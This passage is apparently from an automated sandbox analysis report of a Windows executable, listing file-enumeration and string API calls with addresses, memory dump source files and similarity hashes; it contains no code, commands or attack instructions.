                            • lstrcat.KERNEL32(?,00E61058), ref: 00E551E7
                            • lstrcat.KERNEL32(?,009C9A28), ref: 00E551FB
                            • lstrcat.KERNEL32(?,00E6105C), ref: 00E5520D
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54B7C
                              • Part of subcall function 00E54B60: FindFirstFileA.KERNEL32(?,?), ref: 00E54B93
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E54BC1
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54BD7
                              • Part of subcall function 00E54B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54DCD
                              • Part of subcall function 00E54B60: FindClose.KERNEL32(000000FF), ref: 00E54DE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 040061921b29f40887a78939ac276bd7b30f2091c8743623d8f13bcffc36cae9
                            • Instruction ID: 0be356532d3507eeea914c6ec1c7d99e5866347d018be98a2a3f8ecd69f373b9
                            • Opcode Fuzzy Hash: 040061921b29f40887a78939ac276bd7b30f2091c8743623d8f13bcffc36cae9
                            • Instruction Fuzzy Hash: 792131B6940208A7CB68FBB0ED52EEDB37C9B54301F0045A4F556721C5EEB496CCCB92